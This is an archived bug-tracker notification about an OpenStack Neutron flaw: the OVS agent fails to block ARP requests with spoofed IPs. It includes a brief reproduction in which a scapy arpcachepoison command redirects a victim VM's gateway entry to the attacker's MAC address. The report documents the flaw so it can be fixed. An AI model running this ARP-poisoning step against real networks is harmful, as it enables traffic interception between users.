yahoo-eng-team team mailing list archive

[Thierry Carrez <thierry.carrez+lp@xxxxxxxxx>]

** Changed in: neutron
       Status: Fix Committed => Fix Released

** Changed in: neutron
    Milestone: None => liberty-1

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1456333

Title:
  ovs-agent: doesn't prevent arp requests with faked ips

Status in OpenStack Neutron (virtual network service):
  Fix Released

Bug description:
  Patch
  https://git.openstack.org/cgit/openstack/neutron/commit/?id=aa7356b729f9672855980429677c969b6bab61a1
  setup rules on br-int to prevent faking the IP address in ARP replies.
  But it's also possible to poison a neighbour's ARP cache with a bogus
  ARP request, as the victim updates its cache on receipt of it. That is
  how arpcachepoison in scapy works.

  Here the attacker is 10.0.1.6 and the victim is 10.0.1.7

  victim# ip n
  10.0.1.6 dev tapfccaf7c3-01 lladdr fa:16:3e:33:58:4e STALE
  10.0.1.1 dev tapfccaf7c3-01 lladdr fa:16:3e:10:d3:b2 STALE

  attacker#  scapy
  INFO: Can't import python gnuplot wrapper . Won't be able to plot.
  INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
  WARNING: No route found for IPv6 destination :: (no default route?)
  Welcome to Scapy (2.2.0)
  >>> arpcachepoison("10.0.1.7", "10.0.1.1", interval=1)

  victim# ip n
  10.0.1.6 dev tapfccaf7c3-01 lladdr fa:16:3e:33:58:4e STALE
  10.0.1.1 dev tapfccaf7c3-01 lladdr fa:16:3e:33:58:4e STALE

  This is at the same level as
  https://bugs.launchpad.net/neutron/+bug/1274034, which was deemed not
  to be a security vulnerability.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1456333/+subscriptions